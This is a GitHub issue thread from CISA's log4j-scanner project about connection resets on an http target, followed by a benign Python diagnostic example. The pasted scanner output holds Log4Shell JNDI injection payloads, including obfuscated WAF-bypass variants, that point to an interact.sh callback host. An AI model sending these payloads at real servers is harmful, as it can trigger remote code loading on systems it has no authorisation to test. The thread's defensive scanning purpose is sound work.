cisagov / log4j-scanner

log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Does not work with http or http://***:80 #22

Closed PrestonD88 closed 2 years ago

PrestonD88 commented 2 years ago

I get the following error when I try the http protocol:

EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))

genericcontributor commented 2 years ago

@PrestonD88

A few follow-up questions:

  1. Can you provide a screenshot and command you attempted to run?
  2. Did you try this on multiple HTTP hosts or just one?

This can be caused by the two sides of the connection disagreeing over whether the connection timed out or not during a keepalive.

PrestonD88 commented 2 years ago

Even a simple http request to google.com gave the same response.

python3 log4j-scan.py -u "http://google.com" --waf-bypass

[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: http://google.com
[•] URL: http://google.com | PAYLOAD: ${jndi:ldap://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${::-j}ndi:rmi://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${jndi:rmi://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${lower:jndi}:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] URL: http://google.com | PAYLOAD: ${jndi:dns://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh}
EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.

genericcontributor commented 2 years ago

@PrestonD88

Thanks for the output!

We believe this is normal behavior.

Google has a WAF in front of their applications and is likely dropping/rejecting your packets:

'An existing connection was forcibly closed by the remote host'

It appears that GET/POST requests are being performed by the script. http://google.com is redirected to https://www.google.com as well. You can use --disable-http-redirects to prevent this behavior from happening.

Hope this helps. Closing this issue since the HTTP endpoint does not appear to hinder the scanning itself.
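The two diagnostics raised in this thread (a reset that may be a stale keepalive rather than a rejection, and an http URL that silently ends up at an https one) can be checked independently of the scanner. The probe below is an added example, not code from cisagov/log4j-scanner or from the commenters; it uses only the Python standard library and stands up a constructed loopback origin (`_FakeOrigin`, with hypothetical paths `/drop`, `/flaky` and `/redirect`) in place of a real host. `probe()` never follows redirects, which is what `--disable-http-redirects` gives you in the scanner, and `classify_reset()` retries on a fresh connection so that a one-off keepalive disagreement can be told apart from a peer (for example a WAF) that closes every connection.

```python
"""Added example (not part of cisagov/log4j-scanner): tell a normal redirect,
a one-off stale-keepalive reset and an every-time rejection apart."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit


class _FakeOrigin(BaseHTTPRequestHandler):
    """Constructed stand-in for the remote host (not a real service):
    '/'         -> 200
    '/redirect' -> 301 back to '/'   (like http://host -> https://www.host)
    '/drop'     -> close without a status line, every time (an active drop)
    '/flaky'    -> close once, then 200 (what a stale keepalive looks like)"""
    protocol_version = "HTTP/1.1"
    flaky_hits = 0

    def log_message(self, *_):  # keep the demo quiet
        pass

    def do_GET(self):
        if self.path == "/drop":
            self.close_connection = True  # no response: the client sees a reset
            return
        if self.path == "/flaky":
            type(self).flaky_hits += 1
            if type(self).flaky_hits == 1:
                self.close_connection = True
                return
        if self.path == "/redirect":
            self.send_response(301)
            self.send_header("Location", f"http://{self.headers['Host']}/")
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_origin():
    """Start the constructed origin on a random loopback port; return its base URL."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeOrigin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def probe(url, timeout=5.0):
    """One GET to url on a fresh connection, never following redirects.
    Returns {'kind': 'ok' | 'redirect' | 'reset' | 'error', ...}."""
    p = urlsplit(url)
    cls = http.client.HTTPSConnection if p.scheme == "https" else http.client.HTTPConnection
    conn = cls(p.hostname, p.port, timeout=timeout)
    try:
        conn.request("GET", p.path or "/", headers={"Connection": "close"})
        resp = conn.getresponse()
        resp.read()
        loc = resp.getheader("Location")
        if 300 <= resp.status < 400 and loc:
            return {"kind": "redirect", "status": resp.status, "location": loc}
        return {"kind": "ok", "status": resp.status}
    except ConnectionResetError as exc:
        # RemoteDisconnected (peer closed before any status line) and a TCP RST
        # both land here; this is the "forcibly closed" case from the issue.
        return {"kind": "reset", "detail": str(exc)}
    except (OSError, http.client.HTTPException) as exc:
        return {"kind": "error", "detail": repr(exc)}
    finally:
        conn.close()


def probe_following(url, max_hops=3):
    """Follow up to max_hops redirects and record every hop, so a scan of
    http://host shows where it really ended up."""
    hops = []
    for _ in range(max_hops + 1):
        r = probe(url)
        hops.append((url, r))
        if r["kind"] != "redirect":
            break
        url = r["location"]
    return hops


def classify_reset(url, attempts=2):
    """'transient': reset that clears on a fresh connection (stale keepalive on
    one side); 'rejected': reset on every attempt (peer is dropping us);
    'no-reset': never reset."""
    kinds = [probe(url)["kind"] for _ in range(attempts)]
    if "reset" not in kinds:
        return "no-reset"
    return "rejected" if all(k == "reset" for k in kinds) else "transient"


if __name__ == "__main__":
    base = start_origin()
    print(probe(base + "/redirect"))            # redirect, not followed
    print(probe_following(base + "/redirect"))  # two hops, ends at 200
    print(classify_reset(base + "/drop"))       # rejected
    print(classify_reset(base + "/flaky"))      # transient
```

Run against a real host, `probe("http://example")` reporting a 301 to an https Location is the redirect the comment above describes, and a `classify_reset` result of `rejected` is the pattern you would expect from a WAF that closes the connection on every attempt; `transient` is worth a retry rather than a bug report.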